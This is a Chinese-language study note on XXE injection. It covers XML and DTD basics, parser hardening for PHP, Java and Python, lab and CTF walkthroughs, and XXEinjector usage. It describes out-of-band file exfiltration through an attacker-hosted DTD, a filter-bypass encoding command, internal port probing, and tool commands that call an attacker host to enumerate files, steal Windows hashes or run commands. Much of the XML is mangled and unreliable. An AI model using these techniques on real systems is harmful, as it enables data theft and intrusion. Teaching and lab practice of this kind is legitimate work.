参考博客:https://www.cnblogs.com/zhengna/p/15740341.html
本文为作者本人笔记和复现,侵删
思维导图
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
①XML声明
②DTD文档类型定义(可选)
③文档元素
DOCTYPE foo [
<!ELEMENT foo ANY >
]>
<foo>&xxe;foo>
SYSTEM标识符意味着该实体将从外部来源获取内容
<!DOCTYPE note [
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT head (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]]]>
<note>
<to>Daveto>
<from>Tomfrom>
<head>Reminderhead>
<body>You are a good manbody>
note>
文档类型定义(DTD)可定义合法的XML文档构建模块
它使用一系列合法的元素来定义文档的结构
DTD可被成行地声明于XML文档中,也可作为一个外部引用
DOCTYPE 根元素 [元素声明]>
DOCTYPE 根元素 SYSTEM "文件名">
(1)内部实体声明
(2)外部实体声明
(3)参数实体声明
文件读取
RCE执行
内网攻击
Dos攻击
...
1、输出形式
①有回显:
协议玩法:http、file、各个脚本支持协议
外部引用:DTD文件引用
②无回显:外部引用-反向连接配合
2、过滤绕过
①各种协议
②外部引用
③编码UTF-16BE
PHP:
libxml_disable_entity_loader(true);
Java:
DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
过滤关键字:
补充-各脚本支持的协议
存在xxe的情况下:
如下脚本,将其复制粘贴,提交,成功读取pikachu服务器某文件内容
DOCTYPE ANY [
]>
<x>&myqf;x>
//xxe为变量,读取1.txt
//打印出来
//用file协议读指定路径的文件
//myqf 要对应
//<x>名字任意
如下脚本,将其复制粘贴,提交,返回为空。
DOCTYPE foo [
<!ELEMENT foo ANY >
]>
<x>&myqf;x>
//foo 任意名字都可,作用是定义一个对象
返回为空,说明内网中192.168.0.103服务器上,index.txt文件是存在的,也可以说8081端口是开放的,因此这里这个xxe漏洞,可以实现内网探针。
为什么这里返回为空,说明index.txt文件是存在的?因为如下测试显示,改为不存在的1132323.txt后,服务器返回一行报错信息。
读CASE是在安装expect扩展的PHP环境里执行系统命令
DOCTYPE ANY [
]>
<x>&xxe;x>
由于本地环境未安装expect扩展,因此该玩法未测试。
利用条件:网站未禁止外部实体应用
DOCTYPE test [
%file;
]>
<x>&send;x>
//引入外部实体dtd,dtd就是xml的后缀,识别为xml格式
//如果设置了禁止外部实体引用,将会失效
可以在远程攻击者服务器(127.0.0.1)上保存的evil2.dtd写上:
引入外部实体dtd,核心代码在dtd文件中,一方面是为了绕过一些服务器的限制,另一方面是为了自定义一些攻击代码,类似于远程文件包含漏洞。如下图,成功回显服务器上文件内容。
pikachu注释掉回显代码,构造无回显的环境
利用前提:漏洞机有开始日志功能
CustomLog “logs/access.log” common
#无回显-读取文件
日志文件:C:\phpStudy\Apache\logs
需要开启日志功能:打开httpd.conf配置文件,去掉CustomLog “logs/access.log” common前面两个##
注:dtd里的内容,内部的%号要进行实体编码成%
DOCTYPE test [
%dtd;%send;
]>
"
>
%payload;
此时把脚本复制粘贴,提交,服务器不再返回任何信息
本地开启日志,查找日志就可以看到test.txt数据了。
将数据base64解码,得到原始数据。
ENTITY
SYSTEM file等关键词被过滤–>使用编码方式绕过:UTF-16BEcat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml
DOCTYPE ANY [ ]>
<x>&f;x>
//读php源码
https://www.cnblogs.com/20175211lyz/p/11413335.html
http://www.cl4y.top/xxe%e7%ac%94%e8%ae%b0/
https://lab.wallarm.com/xxe-that-can-bypass-waf-protection-98f679452ce0/
<forgot><username>adminusername>forgot>
靶场下载地址:https://github.com/c0ny1/xxe-lab
以xxe-lab靶场登录框为例,使用burp抓包时,可以右击send to Spider自动爬行网站,所有的网站数据包会在Proxy-History模块显示。
此时可以全局搜索xml关键字
也可以查看MIME type类型是否为XML,MIME type类型为XML对应Content-Type: text/xml或Content-Type: application/xml,对应内容形式如下:
<user><username>2username><password>2password>user>
找到xxe漏洞点后,使用如下脚本攻击测试,成功读取到服务器上文件内容。
DOCTYPE Mikasa [
]>
<user><username>&test;username><password>Mikasapassword>user>
显示如下
真题地址:http://web.jarvisoj.com:9882/
抓包如下,数据包使用的是json格式,此处使用盲猜的方法检测是否存在xxe漏洞。
更改请求数据格式为:application/xml
,使用以下脚本,成功读取服务器文件passwd内容。
DOCTYPE ANY [
]>
<x>&f;x>
很多靶场镜像的网站:https://vulnhub.com
本案例靶场下载地址:https://download.vulnhub.com/xxe/XXE.zip
利用过程:扫描IP及端口–>扫描探测目录–>抓包探针xxe安全–>利用xxe读取源码–>flag指向文件–>base32 64解密–>php运行–>flag
<1>在本机虚拟机环境安装靶场,靶场安装后,由于我们不知道用户名密码,无法进入(一般镜像环境不会告诉你用户名密码,防止你进入后直接查看后台源码);
<2>同时在本机虚拟机环境安装安装忍者系统,打开忍者系统,查看自身IP为192.168.64.135;
<3>在忍者系统扫描同网段:nmap -sS 192.168.64.1/24,成功得到靶机的IP及开放端口。
<4>在浏览器打开如下
<5>由于这是一个web网站,我们可以尝试扫描web目录,或者直接查看robots.txt找到关键目录。
<6>进入/xxe/目录,发现是个登录框。
<7>尝试抓包查看,发现登录参数采用xml格式传输,猜测这里有xxe漏洞。
<8>尝试攻击一下,利用以下脚本读取xxe.php源码。
DOCTYPE r [
<!ENTITY r ANY >
%a;
]>
<root><name>≈name><password>hjpassword>root>
成功回显
PS:这里为什么使用php://filter协议而不是使用file://协议呢?原因是php://filter协议读取文件时,不需要文件的绝对地址,而file://协议需要文件的绝对地址。
<9>将xxe.php改为admin.php,成功读取admin.php源码
<10>base64解码源代码后,分析,成功找到用户名密码。
<11>密码是md5散列后的值,将其解密后得到原始密码为admin@123,使用用户名密码登录网站。
<12>登录成功后,显示如下页面,点击flag。
<13>点击flag后,跳转到flagmeout.php页面,但是显示无法打开该页面。
<14>再次尝试读取flagmeout.php页面源代码。
DOCTYPE r [
<!ENTITY r ANY >
%a;
]>
<root><name>≈name><password>hjpassword>root>
这里由于flagmeout.php文件在根目录下,而不是在/xxe/目录下,因此读取时需要写为./flagmeout.php。
成功回显
<15>base64解码源代码,找到加密后的flag。
<16>分析flag,发现是base32编码,将其在线解码,得到字符串如下。
<17>该字符串是base64编码,再将其base64解码,成功得到flag地址:/etc/.flag.php
<18>继续使用脚本读取该文件
<19>base64解码如下,分析,这是一段php代码。
<20>将这段PHP代码在线运行一下,成功得到flag。
XXEinjector是一款基于Ruby的XXE注入工具,它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。
运行前提:Ruby运行环境,建议在kali环境下运行。
基本参数详解
--host 必填项– 用于建立反向链接的IP地址。(--host=192.168.0.2)
--file 必填项- 包含有效HTTP请求的XML文件。(--file=/tmp/req.txt)
--path 必填项-是否需要枚举目录 – 枚举路径。(--path=/etc)
--brute 必填项-是否需要爆破文件 -爆破文件的路径。(--brute=/tmp/brute.txt)
--logger 记录输出结果。
--rhost 远程主机IP或域名地址。(--rhost=192.168.0.3)
--rport 远程主机的TCP端口信息。(--rport=8080)
--phpfilter 在发送消息之前使用PHP过滤器对目标文件进行Base64编码。
--netdoc 使用netdoc协议。(Java).
--enumports 枚举用于反向链接的未过滤端口。(--enumports=21,22,80,443,445)
--hashes 窃取运行当前应用程序用户的Windows哈希。
--expect 使用PHP expect扩展执行任意系统命令。(--expect=ls)
--upload 使用Java jar向临时目录上传文件。(--upload=/tmp/upload.txt)
--xslt XSLT注入测试。
--ssl 使用SSL。
--proxy 使用代理。(--proxy=127.0.0.1:8080)
--httpport Set 自定义HTTP端口。(--httpport=80)
--ftpport 设置自定义FTP端口。(--ftpport=21)
--gopherport 设置自定义gopher端口。(--gopherport=70)
--jarport 设置自定义文件上传端口。(--jarport=1337)
--xsltport 设置自定义用于XSLT注入测试的端口。(--xsltport=1337)
--test 该模式可用于测试请求的有效。
--urlencode URL编码,默认为URI。
--output 爆破攻击结果输出和日志信息。(--output=/tmp/out.txt)
--timeout 设置接收文件/目录内容的Timeout。(--timeout=20)
--contimeout 设置与服务器断开连接的,防止DoS出现。(--contimeout=20)
--fast 跳过枚举询问,有可能出现结果假阳性。
--verbose 显示verbose信息。
枚举HTTPS应用程序中的/etc目录:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl
使用gopher(OOB方法)枚举/etc目录:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
二次漏洞利用:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt
使用HTTP带外方法和netdoc协议对文件进行爆破攻击:
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc
通过直接性漏洞利用方式进行资源枚举:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
枚举未过滤的端口:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
窃取Windows哈希:
ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes
使用Java jar上传文件:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf
使用PHP expect执行系统指令:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls
测试XSLT注入:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt
记录请求信息:
ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt
忍者系统
还集成了很多xxe的payload,可以供我们直接利用。
参考:https://www.cnblogs.com/bmjoker/p/9614990.html
xxelab靶场登陆框测试-检测发现
①提交的数据包含 XML 格式如:
admin
②请求头中如:
Content-Type:text/xml 或 Content-type:application/xml
DOCTYPE admin [
]>
<user><username>&test;username><password>adminpassword>user>
CTF-Jarvis-OJ-Web-XXE 安全真题复现-数据请求格式
更改请求数据格式:application/xml
DOCTYPE ANY [
]>
<x>&f;x>
XXE-Vulnhub CTF真题复现
DOCTYPE ANY
[ ]>
<root><name>&xxe;name><password>hjpassword>root>
base64中包含大写字母(A-Z),小写字母(a-z),数字0—9以及+/;
base32中只包含大写字母(A-Z)和数字234567
xxe漏洞自动化注射脚本工具-XXEinjector 需要Ruby语言环境
【涉及资源】
http://web.jarvisoj.com:9882/ CTF-Jarvis-OJ-Web-XXE靶场
https://github.com/c0ny1/xxe-lab xxe靶场
https://www.cnblogs.com/bmjoker/p/9614990.html XXEinjector注入工具
https://www.cnblogs.com/20175211lyz/p/11413335.html XXE基本知识
https://download.vulnhub.com/xxe/XXE.zip XXE-Vulnhub靶场镜像